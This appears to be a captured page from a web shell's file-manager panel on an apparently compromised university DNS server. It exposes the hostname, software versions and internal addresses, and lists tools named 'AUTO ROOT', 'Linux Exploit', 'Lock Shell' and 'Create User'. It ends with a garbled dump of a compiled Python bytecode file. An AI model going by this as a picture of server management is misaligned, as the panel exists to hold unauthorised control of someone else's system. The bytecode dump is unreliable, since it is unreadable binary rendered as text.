Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
hplip /
base /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
avahi.cpython-310.pyc
1.53
KB
-rw-r--r--
codes.cpython-310.pyc
20.58
KB
-rw-r--r--
device.cpython-310.pyc
58.31
KB
-rw-r--r--
dime.cpython-310.pyc
2.27
KB
-rw-r--r--
exif.cpython-310.pyc
21.46
KB
-rw-r--r--
g.cpython-310.pyc
11.89
KB
-rw-r--r--
imageprocessing.cpython-310.pyc
22.05
KB
-rw-r--r--
imagesize.cpython-310.pyc
3.94
KB
-rw-r--r--
__init__.cpython-310.pyc
171
B
-rw-r--r--
ldif.cpython-310.pyc
13.46
KB
-rw-r--r--
LedmWifi.cpython-310.pyc
19.31
KB
-rw-r--r--
local.cpython-310.pyc
1.34
KB
-rw-r--r--
logger.cpython-310.pyc
11.54
KB
-rw-r--r--
magic.cpython-310.pyc
60.8
KB
-rw-r--r--
maint.cpython-310.pyc
36.84
KB
-rw-r--r--
mdns.cpython-310.pyc
6.58
KB
-rw-r--r--
mfpdtf.cpython-310.pyc
6.38
KB
-rw-r--r--
models.cpython-310.pyc
11.33
KB
-rw-r--r--
module.cpython-310.pyc
14.12
KB
-rw-r--r--
os_utils.cpython-310.pyc
1.53
KB
-rw-r--r--
password.cpython-310.pyc
8.26
KB
-rw-r--r--
pkit.cpython-310.pyc
8.9
KB
-rw-r--r--
pml.cpython-310.pyc
19.87
KB
-rw-r--r--
queues.cpython-310.pyc
9.33
KB
-rw-r--r--
services.cpython-310.pyc
6.42
KB
-rw-r--r--
six.cpython-310.pyc
17.52
KB
-rw-r--r--
sixext.cpython-310.pyc
5.66
KB
-rw-r--r--
slp.cpython-310.pyc
3.79
KB
-rw-r--r--
smart_install.cpython-310.pyc
6.35
KB
-rw-r--r--
status.cpython-310.pyc
36.31
KB
-rw-r--r--
strings.cpython-310.pyc
23.76
KB
-rw-r--r--
tui.cpython-310.pyc
10.15
KB
-rw-r--r--
utils.cpython-310.pyc
60.55
KB
-rw-r--r--
validation.cpython-310.pyc
3.16
KB
-rw-r--r--
vcard.cpython-310.pyc
28.54
KB
-rw-r--r--
wifi.cpython-310.pyc
15.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : slp.cpython-310.pyc
o �/�a6 � @ s� d dl Z d dlZd dlZd dlZd dlZd dlZd dlZddlT ddlm Z ddl mZmZm Z e�dej�Ze�dej�Ze�dej�Ze�d ej�Ze�d ej�Ze�dej�Ze�dej�Ze�d ej�Zddd�Zddd�ZdS )� N� )�*)�utils)� to_bytes_utf8� to_unicode�to_string_utf8z"\(\s*x-hp-prod_id\s*=\s*(.*?)\s*\)z\(\s*x-hp-mac\s*=\s*(.*?)\s*\)z#\(\s*x-hp-num_port\s*=\s*(.*?)\s*\)z\(\s*x-hp-ip\s*=\s*(.*?)\s*\)z&\(\s*x-hp-p1\s*=(?:\d\)|\s*(.*?)\s*\))z&\(\s*x-hp-p2\s*=(?:\d\)|\s*(.*?)\s*\))z&\(\s*x-hp-p3\s*=(?:\d\)|\s*(.*?)\s*\))z\(\s*x-hp-hn\s*=\s*(.*?)\s*\)� c C s^ d }z.t � t jt jt j�}t � t jt j�}|�d� |�� d }|�� |�d� t� d| �} W n t j yF t� d� |rC|�� Y d S w z|�t j t jd� |�t j t jd� W n tt j fyg Y nw z&|�t jt j| � |�t jt jt �|�t �d� � |�t jt jd� W |S ty� } zt� d| � |r�|�� W Y d }~d S d }~ww )N)z1.2.3.4�8 r �Bz Network errorr z0.0.0.0z,Unable to setup multicast socket for SLP: %s)�socket�AF_INET� SOCK_DGRAM�IPPROTO_UDP�connect�getsockname�close�setblocking�struct�pack�error�log� setsockopt� SOL_SOCKET�SO_REUSEADDR�SO_REUSEPORT�AttributeError�SOL_IP�IP_MULTICAST_TTL�IP_MULTICAST_IF� inet_aton�IP_MULTICAST_LOOP� Exception)�ttl�s�x�intf�e� r'